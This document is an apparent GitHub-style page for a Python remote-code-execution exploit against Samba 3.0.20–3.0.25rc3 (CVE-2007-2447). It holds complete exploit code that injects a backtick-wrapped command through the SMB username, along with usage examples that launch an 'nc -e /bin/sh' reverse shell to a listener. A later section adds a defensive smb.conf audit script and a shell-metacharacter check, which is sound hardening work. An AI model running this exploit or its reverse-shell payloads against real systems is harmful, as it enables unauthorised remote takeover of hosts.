CVE-2007-2447 in Python
Description
Python implementation of the 'username map script' RCE exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
Usage
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
- IP - IP address of the remote machine.
- PORT - (Optional) Port that SMB is listening on; defaults to 139.
- PAYLOAD - Command to be executed on the remote machine, e.g. a reverse shell.
Examples:
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
Code
#!/usr/bin/python3
#
# Samba 3.0.20 < 3.0.25rc3
# 'username map script' RCE Exploit
# by Ziemni
#
import sys

try:
    from smb.SMBConnection import SMBConnection
except ImportError:
    print("pysmb is not installed: python3 -m pip install pysmb")
    sys.exit(1)

# Accept either <IP> <PAYLOAD> or <IP> <PORT> <PAYLOAD>.
if not (2 < len(sys.argv) < 5):
    print("Usage:")
    print("  python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
    print("  IP      - IP address of the remote machine.")
    print("  PORT    - (Optional) Port that SMB is listening on.")
    print("  PAYLOAD - Command to be executed on the remote machine, e.g. a reverse shell.")
    print("")
    print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
    sys.exit(1)

if len(sys.argv) == 3:
    ip = sys.argv[1]
    port = 139
    payload = sys.argv[2]
else:
    ip = sys.argv[1]
    port = sys.argv[2]
    payload = sys.argv[3]

# The vulnerable 'username map script' hands the unsanitised username to a shell,
# so a username wrapped in backticks is executed as a command.
user = "`" + payload + "`"

# Password, client name and server name are irrelevant; only the session setup
# with the crafted username needs to reach the server. NTLMv1 is forced because
# the affected Samba releases are expected to negotiate it.
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)

try:
    print("[*] Sending the payload")
    conn.connect(ip, int(port))
    print("[*] Payload was sent successfully")
    sys.exit(0)
except Exception as e:
    print("[*] Something went wrong")
    print("ERROR:")
    print(e)
    sys.exit(1)
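The vulnerable condition is the 'username map script' directive in smb.conf, and the vendor workaround for CVE-2007-2447 is to remove it. The following added example (not part of the exploit above) is a small defender-side check: it parses an smb.conf, reports whether the directive is set, and flags usernames containing shell metacharacters such as the backticks the exploit relies on. The two smb.conf snippets and the script path are constructed for illustration.

```python
import re

# Constructed sample configurations (not from any real host).
VULNERABLE_CONF = """
[global]
    workgroup = WORKGROUP
    ; the directive that makes CVE-2007-2447 exploitable
    username map script = /etc/samba/scripts/mapusers.sh
[homes]
    browseable = no
"""

HARDENED_CONF = """
[global]
    workgroup = WORKGROUP
[homes]
    browseable = no
"""


def parse_smb_conf(text):
    """Return {section: {key: value}} for an smb.conf-style file.
    Keys are lowercased and internal whitespace collapsed, as Samba does."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def username_map_script(text):
    """Configured 'username map script' path, or None when the directive is absent."""
    return parse_smb_conf(text).get("global", {}).get("username map script")


# Characters a shell would interpret if the username reaches a map script.
SHELL_META = re.compile(r"[`$|;&<>()\\\"'\n]")


def is_suspicious_username(name):
    """True when an SMB username carries shell metacharacters (e.g. backticks)."""
    return bool(SHELL_META.search(name))
```

Run `username_map_script()` over each host's smb.conf as part of a configuration audit; a non-None result on an affected Samba version is the finding to remediate.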
Resources
CVE-2007-2447: Remote Command Injection Vulnerability
Samba 3.0.20 < 3.0.25rc3 - ‘Username’ map script’ Command Execution (Metasploit)